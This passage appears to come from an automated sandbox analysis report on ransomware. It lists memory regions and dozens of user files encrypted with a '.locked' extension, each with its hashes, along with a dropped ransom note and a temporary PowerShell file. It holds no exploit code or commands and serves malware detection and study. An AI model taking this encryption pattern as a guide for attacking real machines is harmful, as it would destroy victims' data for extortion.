|
- |
| psapi.dll | 0x773d0000 | 0x773d5fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007f074000 | 0x7f074000 | 0x7f076fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f077000 | 0x7f077000 | 0x7f079fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f07a000 | 0x7f07a000 | 0x7f07cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f07d000 | 0x7f07d000 | 0x7f07ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007f080000 | 0x7f080000 | 0x7f17ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f180000 | 0x7f180000 | 0x7f1a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f1a3000 | 0x7f1a3000 | 0x7f1a5fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f1a6000 | 0x7f1a6000 | 0x7f1a6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f1a7000 | 0x7f1a7000 | 0x7f1a9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f1aa000 | 0x7f1aa000 | 0x7f1acfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f1ad000 | 0x7f1ad000 | 0x7f1adfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
|
For performance reasons, the remaining 154 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\CIiHmnxMn6Ps\Desktop\KX_rKkh.png.locked | 55.04 KB |
MD5:
d628e7b001504bb653ac2a22e6a39424
SHA1: c7d3084cc50b4d0ab81a5c9d079025ced92f35c0 SHA256: 5cb0a7ebe7fffe62883188c4aee1d7b66cf929bd44529eb8b00b47662478f4ca SSDeep: 768:73eMJ1UyZPoQdcEpFcsD8yVmM8CnAkjHA3ck4FVmGzXVsElDi621lkOG4PZ0WT28:7NP/WELczylG3j4FsGzXPmqj4P6q28 |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\v4uFQ3drCrneJS8a8Q.jpg.locked | 95.11 KB |
MD5:
7259f2260ab39ea3d48b0c17d4bff4b4
SHA1: 81cbd27389ae10895e7787211c68ed8172b2d15b SHA256: 42baaba951a1b37e68e621a48a06d91a74b88a584ab187a11fa3ce984f47dc2d SSDeep: 1536:0lPRDxCSdXxmPzoEuxOcVAG1TmSefR0ftlxiz/POOIebiMdVk7GJnR:wdQ0EuxDVAcaSeJOtliI8aC |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\Z-c0IkpuKEU4ZDyc.wav.locked | 97.82 KB |
MD5:
313f6dd8fb6ff3fd2596e1f1bb1a3402
SHA1: 5901eacea4027840f7c485a2e7ea68972a5be987 SHA256: aa537fbdb719332d620aac595cdf78d9826b789d07eaf1b5048f0bbb082fdceb SSDeep: 1536:ot5JA66Vw4IwjuKNoPApzW4RpKyEhfbfVB5N8KUoBFjBmu9CEO0DoCei34:wCN64IbGdV69UovjI8CEOjCeiI |
|
|
| C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\Vb5Pa8xPVj.avi.locked | 37.07 KB |
MD5:
63ae8c95d180116b4e326bbe195bcc13
SHA1: 630414daff4a6bd1416605ebf91c305badf6d2cb SHA256: 94a7d6c0df5f05294976a36647809074a6775a4ea512559adcde9b7de76d882a SSDeep: 768:KkokSTyLmmjqM0JAVi+8PkyLwby2ao4EUdw5OsevoFpXMywJ8XAHa4L:uuaM0Js38PDLwby2aoseOseucv883L |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\avye6SG6OrNqPpJLT.wav.locked | 10.21 KB |
MD5:
1737e2c38cd3aeac19d6769687cb0b37
SHA1: 51046b822d4552ecc4d69e1fe5d7faf0acf39f8f SHA256: a7e5d6c5daf021ec20b987abc6560ae6d1ddb677f1fc741938b7cdb606461348 SSDeep: 192:+uUszd3R/SkTa6v5/ma2G1oL110FtYjqEVku383d2C1kRxN5Qx0RHanq:+u53xSMa6v5/X2G1oL11zjqEVB3MRmRT |
|
|
| C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SjcFG1OlUFBEJrNY.avi.locked | 88.29 KB |
MD5:
5ad1a8b3894cbfa289bdef36edd15309
SHA1: 0ff3a9b5deba553edc4a123dfa745e6a9cddefd6 SHA256: eea6c4e9b8d1b52fcd37a3fb7100c1ca9365e2e3abcdd95fe8fa51b6c8d15c92 SSDeep: 1536:QI1MKVTOgyA+/DQlMKvtYtpaZmMnH+HYo3bQrHEHsEMd2on3U/G1:R1Oc3ivVMnHAUhdtUs |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\S cIA1W\ULtQg.png.locked | 65.88 KB |
MD5:
9f778b32e25b42bf1d333a7e206d7d3f
SHA1: deef0923ea59dacef2190ef196745df3cb34f674 SHA256: ec74070749c7eaaf0aa6a01493370bf1371bfa28a2cb5e781b787e17c4df98e7 SSDeep: 1536:q+QqmHJh+3NHt5+geciy0yBWpefcP8jC7FFX:svHJh+dn+g7lNBWucPNFX |
|
|
| C:\Users\CIiHmnxMn6Ps\Videos\diClcej\ZbkiOEeh.avi.locked | 91.25 KB |
MD5:
56b06573844013f360e3b618cc4d1669
SHA1: d3d849dd696c5137280190b02e4455d5e9dea21f SHA256: 7c18084cc7b488f20504c28386b4380804d46f0aa9094a9286c9936382afa01f SSDeep: 1536:TRDCAN8ajUVn4f7NWjXUCwyNC1yGLsqKFnrqYuozq1XJNNuZt1lW+IrP6ln3:pCANMSf7NwYeC1yk4FnTu6kXJSdA+ig |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\YkLAdH4jxPx.png.locked | 17.47 KB |
MD5:
df2c753dae6fb8248852d1f092f6e003
SHA1: 5fb368800f39dd39b963e90852d619c30b5ac2b4 SHA256: f82a22d896ae6f66a1fff24b27f6cf9b140d3689aa3181f1fd40c450262e4d6e SSDeep: 384:ZE3VDOGX14MIo3oR6zRjQSI2MP44KHC2nvHO5ampDWlODiskzfGPrY:ZLGNIOO6RjQr2LTnvHIMAil0c |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\Oq0x e.mp3.locked | 85.13 KB |
MD5:
3680fee95a676ce9f0d60103218610ab
SHA1: 4bda69ef049cc637eb60535ccbd9c79abeb53a62 SHA256: 822c661a191889b04301422e904df8280303bbaff9067159e75bdce4df5c17db SSDeep: 1536:mpSD1c6cZGLvVJDFnsGI7h8bi5Nvj41+q0fyViFL+J3vdSHEFpj7:mpSD1c9CVJZsX4Q+KyVUK6Ejj7 |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\Erp22jU.mp3.locked | 98.00 KB |
MD5:
30d11e57e17f99e0efd8efde0eab9a6d
SHA1: 2c406186169048d8405fee1b9cbb31f7a9f94c3e SHA256: 6c1267afed28a09ff920febc3a4bff2cdeed6527313987b387074440237c94c1 SSDeep: 3072:Cst6tBrQyruAodp7E2X7U9qY6RuQrtza6o/:dcDDubdV1DYkuQhzaB |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\pKXeHdgfssh.wav.locked | 1.38 KB |
MD5:
6cad616127793d9d0220b61fadaed5c7
SHA1: d698b9bf6abb85a46b6e184e69d606f1834ba664 SHA256: 6591c345e003cb358abc524ea1ab41dadd939a085418b54d9f047a869c3f9513 SSDeep: 24:sgCedXP9JBfPky5Vt5RqV3OWYAGkyZ2VrJxy5Q8/EAntQjOjJ+zWzaPy:FFpkiCV3OcGtZ2VHy5Q8/EAntcOjJ+zS |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\SIwc yV9OudDSB.bmp.locked | 92.05 KB |
MD5:
6de72d89630f938dcefb2f37d86f66ed
SHA1: 5d3b99c03d75100ccdce5e1588a0f7e172133ad0 SHA256: 1f0ac942e4cebbb4dd62eb165f5e21a2e475e9d8d8ec7e2f0a0d587b20dff652 SSDeep: 1536:S3qhjXj9YoVQ5/daSKjTKnhkayTF8Xsv8rnVnB5RCDprv9UOVtm70VC2JlvR:DhjzQ5/dcjmhkaTXamM/UcoK7lvR |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\tjx9MJXctDgn1Dq76.wav.locked | 50.72 KB |
MD5:
37ab9de927a5c21a9af3505fa3add41e
SHA1: 124510cf11690c1c8f5d19680e40cd384d5acf9a SHA256: 7e9a0284c2edbd871120a53752b09356ea2dd098bc2575b826a9e52bc568639f SSDeep: 1536:S0UyKPKzSdTy1vr1Rod+Gl4lQTyzP/KWoViovvYZSOT:faSudKvZylmzP/neeT |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\hNXBhfyvUVDA.png.locked | 34.91 KB |
MD5:
bb9c86b3372b31760f47f0bc3f625c4b
SHA1: 2e606d1d3ac180cd7d544f620324d68facb31c10 SHA256: 045e3d6162c3688d863027d5063cd910c11d7df7282a49b902c57165be9c1369 SSDeep: 768:xHl9PFQU7eo6HpjpdUBDAGkaULP1+GdrOc/xnJLHi:NjB6HpNd0g3+GIc/xJLHi |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\QkF2RTAApL-d\StQSYWIf9AviDjW.mp3.locked | 10.80 KB |
MD5:
0d07eb23edd45160cae547497d56252e
SHA1: 6cf81d92e2caa93997a22bbe3ef60cd175c88869 SHA256: 94e40da0a3aea4e8262bb2cfd9daea537af396fe17c309ef280b4739fbd36b13 SSDeep: 192:pYIBQ0Xn2KPfEwHzrHWm2N/eFeQrgnHew5aRLfi3H38IwdWjmRQpEZ3cXg:pYQ2pwGjN2dgnHeBxggsmxBcXg |
|
|
| C:\Users\CIiHmnxMn6Ps\Documents\XfssG\8HE3QHMMwwsp.doc.locked | 89.10 KB |
MD5:
ecaaea978ff4969312cfafc60e5d5d58
SHA1: df6177f43fb5fc934b2e3077b73ad68fe4257579 SHA256: c46d65086c94a7bc96330021d89b1abbfc6cf9e3f9b32aa7ce3d29453c3f4e99 SSDeep: 1536:aHprOC/qZczclFtDPJ+yA37zmZOcLg8agicsBEHSD50Ps1nn6PuZhW1dWANfml5:aHqCzUPJ+JHfcdMcsHdZNRZhWvWMfQ |
|
|
| C:\Users\CIiHmnxMn6Ps\Videos\bOunbBUFbvQg3h6.mp4.locked | 37.72 KB |
MD5:
27df61068f2bf1bac4755cd8f6b1d08f
SHA1: bd9ad7a896539b9c8e07a2a24bb36d9a8fca332c SHA256: 6c7ffae6e1134339051b766630bfe63e3d88e834c54f769ab4f9ee21e1c1a73a SSDeep: 768:iMWPUVajWIjTaHOG8h7RRANTeqUrxWePaN0Bto9hSn:WPUV1oHv3rDPk0Bto72 |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\8hE0b6s ArvRBw.mp3.locked | 70.77 KB |
MD5:
3e138b5c31e2ae3a21b6ee17917067d3
SHA1: 5e28aeaae79d530ded78213dcf8cb522d6bfe03e SHA256: 65b013e50f93a51cd94d14f5800eb0eca5142662d399b8c8bdc4cfd0a7eaaf68 SSDeep: 1536:Uq7DDk8rLXBUQCRd/oiLc21KzZ7Pzn3Tm4EL42:Uq7DD7LBlYdwA8zNn3TmTL42 |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\Readme_now.txt | 0.24 KB |
MD5:
f2f22aa02305ff95be6af7c588532bc1
SHA1: be969ca50bea130055a008a7f6ab096fa39e3026 SHA256: 3acee76685d84a1f52208619334633ed4618c57b16ebe3eae7d34baea16b023b SSDeep: 6:Q8lQAfbFr3Bw+FEMTMqsXQBUczcUlVrov:QeQAfJr3Bw+FEeH9UQi |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\QjIEj I9piC4hqUk.mp4.locked | 60.11 KB |
MD5:
c76d701221b2dd37b2c4e06b2e9e8600
SHA1: d5afb7f1a86fb5d132326cacea9e190d63cf9f18 SHA256: 77bb82b579a37a62585b5115801e2aadd7fb2220f6d69c1ae81a32459b34e656 SSDeep: 1536:17V3MmByRGB4Uos4TRb74O+aeC0hHLbZey:1BjBcT90O+a6hHL9l |
|
|
| C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\clKKQ.mp4.locked | 25.68 KB |
MD5:
752028222af9f3bbdb9296814241db13
SHA1: 153a7de127b8eeaf57bd3c61b3fe70e0e84b53ac SHA256: 8fd3b455870a6c4e87e48782c22ff7b6fc0fd9b885bc141650ad43d0911e4822 SSDeep: 384:M8P8/CNmJlBNx2UeWdmbTSBGq9eTvVbmE2gw2wZcUmzt7PyEyrXC0o9XWI3:M8ow2pgAdmnSTUxpicziXYG8 |
|
|
| C:\Users\CIiHmnxMn6Ps\Documents\XfssG\34VA\OcPeaRy wKXh7Zpv1pc-.ppt.locked | 31.80 KB |
MD5:
80c7f3c14619d44eea59c790db2a37ec
SHA1: bee3b6b21423bcb859ae388313c4087ef98a7ab2 SHA256: c65eaef4cc62b7d9807b2dc7c6c967cd3f2b33dd4c482a01cf98d51df9a957bd SSDeep: 768:B8YKFKbCmiEFUCocehB4zXjZFVduRqRlQ5OtzhFq:B8bYbCjEI4bVduR/0q |
|
|
| C:\Users\CIiHmnxMn6Ps\Videos\TS_kNUpb0yewT\SRVu31eZ\RcOsJyPvbT6xM.mp4.locked | 86.21 KB |
MD5:
8621af58431a735bd18232bd2783f52d
SHA1: fa0dcf96cb87c9d5230b9c03926cade3ce19e897 SHA256: 8ca40d0aa98de8f19d76b180875498dc9d60c2d4eb7c08bba4ef74ebf8efe316 SSDeep: 1536:a89rQMWEdIgJOIzC2HGihWIfRnIaLe5UrvPFWvjxFt/eULqOGdwYy:a8eMP/nucWshDC5UZWvdyrOGdy |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\teqoN4jU-y3YF67\dVgzNIdTk 5.wav.locked | 21.22 KB |
MD5:
c28b47fb4faef03f5448df4346544062
SHA1: 0fb135f9879df488717ebe9ebfbbfd617be945c3 SHA256: 0f692b11a81dea2e3fa242582da969baf5e9eb63975b4adfc254f39a1bca90d9 SSDeep: 384:45KSdWB4CA2BdRYzLG6Wjufr70HcqeJA1coPhfXqxZ:45+B4l2BdRErWGf0HcXAV5k |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\qsQ6mdKI ceY3bwGJV_.bmp.locked | 27.46 KB |
MD5:
fb38b9de2cad1a1bfd02e23df668384b
SHA1: d0f145706421b3680d2e030dc6335e93dcc23629 SHA256: c38aa781854374faf2382e37b9c369104d5f6ee8000f0b1ea34cc99f975387c1 SSDeep: 768:F6BepRgGkTo2grsdKNn54drlow8mgIv7UWBun5O8sN:4Iprkk2IArSw8mgIzUWBq5OZ |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\G-z5ID0rnHsJx.avi.locked | 40.86 KB |
MD5:
ab91d1153c894f9405ce40cc41020ae3
SHA1: b41336d7f302ad5524c098b9190188a1718f144d SHA256: 187cb99b05cc897940f00c5a3788e2a0cc75842edf3e40cbc5dbb25ce605bcf1 SSDeep: 768:P5uRPL+6Y275YvOT2pZWtPJz+RPpEhb4HTRDtxQDmsgQyndKJgBB:POT+G5YGQZWtP9CPpdTSCsg6gBB |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\UHH852n7JNWb6yf1z-.mp3.locked | 62.66 KB |
MD5:
3446208ecc80224c3f6137844eb08da4
SHA1: 68dd07078ae22e66b84174fac9d5b14a2a657f93 SHA256: ad1d692c0ce2527f70443efe75aa98337b6dc6d16327b4c1cb6b509ab4be7ba8 SSDeep: 1536:N7EhY3qkbouEKWKKgxEh6WvuWSYII7FG6rwwkaSyylcYDBe3:NQO3ZVaSEuKVGPqyuYDBe3 |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\QkF2RTAApL-d\vxMZno.mp3.locked | 41.57 KB |
MD5:
57d18d5bcec7c323d82a398babf0281a
SHA1: ea45d6b2c35753138d6a4c480a144c1abbf69653 SHA256: 86bc554ce450fd888c4705fa9473ec99d93e4886627494c6ec5f9cc57ac9998a SSDeep: 768:JWgJKYmbNTpvSWIRyGet6U6HzvDu64llLc58KKGi1OpY:JJtmb9FSet6tbu64vLc4GRY |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\u02MUR-nEH a134.wav.locked | 3.19 KB |
MD5:
332cf88608b21da8d0652c67b45b6ee4
SHA1: eec5a15dd1c8b5552c86615ad887165b68a1890c SHA256: c16d0b404f6dcbc5b57c25d8c97e16e6ec7987d30fb05c5308076c6c48e6e865 SSDeep: 96:7aq0DNoII0pW69aKG9atlwPf493Qzi3e9HdhETrbMMI:2X59aDaHGgJe9HLETre |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RERUddz09.bmp.locked | 9.94 KB |
MD5:
82af25feb942eb6ef90e776e20796e15
SHA1: 62d90479cd56994dc57c5c52a5f918553540d6e1 SHA256: ac6bec94cc2d8a91a4bfe31dc571303fff8709463b437a86d4fca7167b44d235 SSDeep: 192:leJBWmoOWl6nCWPwaQnIlJWBR9beq45+HGh+ThZonvMBfiy+0hJ:lnmBwNPIlUH9CCh6E3 |
|
|
| C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\NRZPp.mp4.locked | 77.61 KB |
MD5:
ce2e0e54e884a16ce67edb8e6e86243c
SHA1: 3f18f5ff33cba993617185204021227e42315069 SHA256: e53b87be808d0cc9238ecb7eba2b1ee9679e5e455594e673a1fb4fd9c7192fd9 SSDeep: 1536:6Vh6sAJjex324bGYtaGrk2U6kEG0okCbSqfoVIFpTfV17BiTLm/MaKYy9h:6jujex324iYwGI2zo/SGFpTf/743mCn |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\WCMg2-Z6QQ6nIeKZsX.png.locked | 8.50 KB |
MD5:
de4496b3d01c24c938a0b63c3470faf3
SHA1: 8e6f5801fda073f9c6f94033aa8869839f860cb7 SHA256: 0519bf8baa28cd1a24011ba4b9854f8f76b5a110c9435fdd7448d62eae70d2db SSDeep: 192:+jO3WkThmHPfshnStR0v8tdMZAaf0s8DWqI2xVrNF1K4VH7MUEpUHd:zGkNmHPUA8+dMZAW8DWqI2xHFUUHmpY |
|
|
| C:\Users\CIiHmnxMn6Ps\Videos\diClcej\7Ckjz.mp4.locked | 1.14 KB |
MD5:
b895a60f85c152905ea6a68ba7d642c7
SHA1: 872776d24077cce2bcbba073fe0b9493c0cb0873 SHA256: da26a3af6335bd82bfdf6675b3a702ae62c11bf925bc35274f807d798fb8b845 SSDeep: 24:QwRBCsEZ3bf2a1nFW81GLbYe4LXDQl9kIOB3r4l1:toskbua111GELXDQ9OB0v |
|
|
| C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\uzJKTO_P.avi.locked | 5.61 KB |
MD5:
178462cac3b0806fb7e7e846bea18617
SHA1: 755f062c49cee55279371d3e49936b3f29c30c10 SHA256: 786f0563c6cb2203e0e0e00f36e23ee541264e468122a50f6e5e1fcd2d7a085f SSDeep: 96:i7y6xjTxCKW0Ve9R1J/PgygoHUTr5bHcMsRbizdlmyYSvztBIJwTcUlFyC5b:iT5ToKWr9vpgygH5b8tOzdd5zUJwXLDb |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\Xm1OG.bmp.locked | 31.74 KB |
MD5:
3006eb7f97932de54a34719367603d8c
SHA1: c376ba90ff3c8bb3016f0f78a33fe70d4b046d44 SHA256: e367fc04e36b6755f3cc766be5b10a0569526abedd208570ff0c2fa60d244952 SSDeep: 768:/F09Q8meIhTR2X881TerOragMaV0dZPJnHruc8T:/ee8meIhO9rag1V0VnLutT |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\l0z1bU3ROdKknR1kvU.png.locked | 82.16 KB |
MD5:
1833a008782ffcd3d4e94799ab5ae7db
SHA1: 61c43f1c000fb1b448473728da166ef282c0ada2 SHA256: 83829c23e345662eb22080c31ca2696821503070b1c5fae2dec9a324d8c99206 SSDeep: 1536:mqpSLaY7FVjdGG5JL+ekMpXRlj8MXib9+pMz+NlQTgaUgk+d/6dtZJkNaINarR:MLaY7FVjgG5JLXkMB/j8M8qlQ8aLhd/E |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\D2YLhTMM0CMWDnL8em4n.jpg.locked | 71.41 KB |
MD5:
ad8a138d01de1262d4fa178e24cf400d
SHA1: adec2c45cb74b4fdebf31dcdfafa489ee96c23ba SHA256: a8acd73cc712482b4c9d9cb1597d7489b7d3874c2781a3f5a53f4f9a4be12c06 SSDeep: 1536:8xW9GhR2LVsoIoY3KIDvIrWp3JnDdbpkUuzjBLWd1SqA:SGG2LVKoYaIDvLJDdbyTByTSqA |
|
|
| C:\Users\CIiHmnxMn6Ps\Videos\1GIxhYkmVHOszi\MOy3A3\-A4yrwn2cx3aKb9FG.mp4.locked | 38.33 KB |
MD5:
1bfcf417de8ad090aa95c06b17e917f2
SHA1: 80b3049425b327a330fea000444a2ab3f569c632 SHA256: f3369cd5acaf3f5b3cc3ca9302a7b9a15b522d064732dbddb50af2f6498bf2b5 SSDeep: 768:bVhwWjnF/kjdX2CTKrphSbJfE6if+ULLm4V16wHDl05dlMWrHaAF0pqcku:phw12CT4phSFfEZmULLxV16wHG5fxr56 |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\Wq_YnaSm3vvBO\chRxPw-aovmRZYFe5.mp4.locked | 30.43 KB |
MD5:
5564221823c21bd858d882c6c261b25e
SHA1: edf0bd95f006211e5c830560b35c773b03eaa9de SHA256: 93ba338e231e059540efd89010e052a982df6874e9e9fabe214929ff56e7165b SSDeep: 768:r+I1Vco2zdTOzkMk+AzzNOL/yN8CmOpVGDeEPZUBp1F:rXVco2xKO+KJOkVUpC1F |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\lU2P3BA.jpg.locked | 78.27 KB |
MD5:
d3a6bd7f104e53c4af2c761a7cbfbd48
SHA1: 37bd5f2f808d4f73a3e05d297cf01c18398f660b SHA256: fa94090c22e46e032e020a5d6a89b3850a7c3450e566b5a3bfb725026b7940fd SSDeep: 1536:UzefP/kTvy3NWJDv43miALIg3P47LRZe3NkHjfTwTsJpTKdecQCi+arCOq:Uefku3NWhvViA8gP3NIbGspcRO6 |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\EeZrOX.png.locked | 78.79 KB |
MD5:
11cea350570caac32c19aa95f8a36033
SHA1: c8d02dc0c36f01cb0c0598ccc769d8f3ee838a4e SHA256: 8a89c96ae509bd3c6c9f4c288c32c32e90709d286689f07c049d7e7f191ac5fb SSDeep: 1536:ZOU+UP+rKLwAGfV0wOSJwXZzy+mPUlfxf5s0wqul+9FhGl5uko9kjHl2udSBsOKN:gU1MKLwAYnOHXZ3Blfw03U0iuHWjHltP |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\_l6DV0mZ.gif.locked | 75.49 KB |
MD5:
98b54af482b652a419ada138d1bfb227
SHA1: cd08c7baacfdfe92ddc59e33c563b68d3df73133 SHA256: 634c55a155f5f02433cb2ec60aca04eef5bd962f54d499a8adb47bc6d230b6e2 SSDeep: 1536:6sbaYm6iYPNsa2XJqLqXRlfklr3JB84JNwXExZ5huWb:FBrPqa2XJdM1X84NxZx |
|
|
| C:\Users\CIiHmnxMn6Ps\Documents\XfssG\WDBlAHKP6H9 IkBgIgR_.xls.locked | 59.14 KB |
MD5:
072ed476132d7698ef213f939de6ef02
SHA1: b03dd21f88e28e8d58e347857fe735f3af4d9524 SHA256: 2fb303da9812d65538cb3338930d9282c7b512f31b4088b7ad36f6e068975d48 SSDeep: 1536:vohPrH7h+BPWDBNfqh4IkVNHDGcDUioTUezizGhTMdBD:ghPrbh5DBNfqDkD1Dr7mTMdBD |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\B9FVT.wav.locked | 31.58 KB |
MD5:
b7921b7457769b663e2dbd1cf7a2ae4b
SHA1: ddff778433a0db135240ac322eae09440b759aad SHA256: 66432c1fe3727c4509e020449b5ac99660e1693da5e5a1cacef3ce8a043ad5a8 SSDeep: 768:1gJSjVlVkCqkfiQDxHYnt34jSSc/sjxTeWTA:SSbS6iQDx4nt34jJomxFTA |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\8bbtkH F.mp4.locked | 52.91 KB |
MD5:
35894d534b8072e449b78f6fcee6e3b9
SHA1: 7ffe84f419b72ac15443fad8fb8cdb8b53d9018c SHA256: 89911decbca88dd64900ffb311e84fa7c4716648b0f57a4979efabe859568aa4 SSDeep: 768:KcQafIFPZgpUM52A7HhEUxw751aHAx6DYZkqXhVGNzAwKiatm5CN3:yaAFBguM52WfxwVuXc3XGshN3 |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\Y Te5DP3Fa8_J.avi.locked | 18.07 KB |
MD5:
0eb536bed78341fa40862e08878bb277
SHA1: cdfb6f8cc3db861c7f6fe38e57751b771f677696 SHA256: edc197cdd6e1aff1661b0a78508595527f1124c451202c85189eb36d5922eb65 SSDeep: 384:P/qKfY3/eYqJpx/DMFpwXhGHsgI/4nRJppCEqkw/qP2B7th4lomfp:nQm174Fp8cW/4bppSkw/tZDmfp |
|
|
| C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\lgwbzpbm.v3x.ps1 | 0.00 KB |
MD5:
c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b SSDeep: 3:U:U |
|
|
| C:\Users\CIiHmnxMn6Ps\Documents\LY w2asH62Gyp9.pdf.locked | 38.61 KB |
MD5:
47cc411c21a5a64aa832bb7a6872226f
SHA1: ff3daeb9eb6a8f16838098e96b87c6a3399dafb1 SHA256: 5505faf92c61697c947b439343beacf16cc891bb3c7e20fd295656f9dddab014 SSDeep: 768:q7vPTEAnLLkIGt55VmCrKsjTlz9wvKqolXXxdg0hcxKKJZSrn1NdJ0vPzEo:gPTdLor5Lrl4KNX87In5mvR |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\zRlka8_dcwUT9gHk.avi.locked | 19.74 KB |
MD5:
23f625a67c2845cd2f7be9d2bb506ef3
SHA1: 0e44311802d7ecb79882914733563c2630bc0885 SHA256: 9e2d5a9d08124e72a608d3fed42d0607fbf8fcbb021f181295128ee54c61b607 SSDeep: 384:lZl/Wijv61/WwzCF5XLW8GZcD5FiO2p8UxLYB/rJHCrrk2wGvk+dkYovOin:Bn61yVLWBghIL2rNCBV2Y4 |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\S6Q h1o99wFndWp.bmp.locked | 33.83 KB |
MD5:
906c21dd9fa4c4f66056681a98396c06
SHA1: cd1c6abb6259a73edead07a7be4a6bfe7574bf15 SHA256: 92eb08fff69ab7ab8dd3ba0fab4c4628125be60725b9a8804c235b61cc9a9de3 SSDeep: 768:uCS4OZPuzKJ12XeVjusHowHynjb1FIv424XMVBJkElDPndtCy4S:uIEuzKYIpSjZKAhCBJ7DPvCY |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\JBSN_Faye.wav.locked | 13.71 KB |
MD5:
46cc10a0ffb38909cfa3ab04c59ef62b
SHA1: f681269895e9291dee65093b614cb488b1184cb2 SHA256: dc2b70eb63205003272d9e0ca7a10bebddb8fc96c921e6c76eef92231593e2a8 SSDeep: 384:6Na/vcDMN/GzQ3bFlzdAoDJxYFbsZxm6FqCVijrmGzLI1:78U3xbYFbAxLsAirmGz81 |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\chIug8rBWXt9\8mWncDWtB.bmp.locked | 35.91 KB |
MD5:
3112914f586326409506c3fe42c52d46
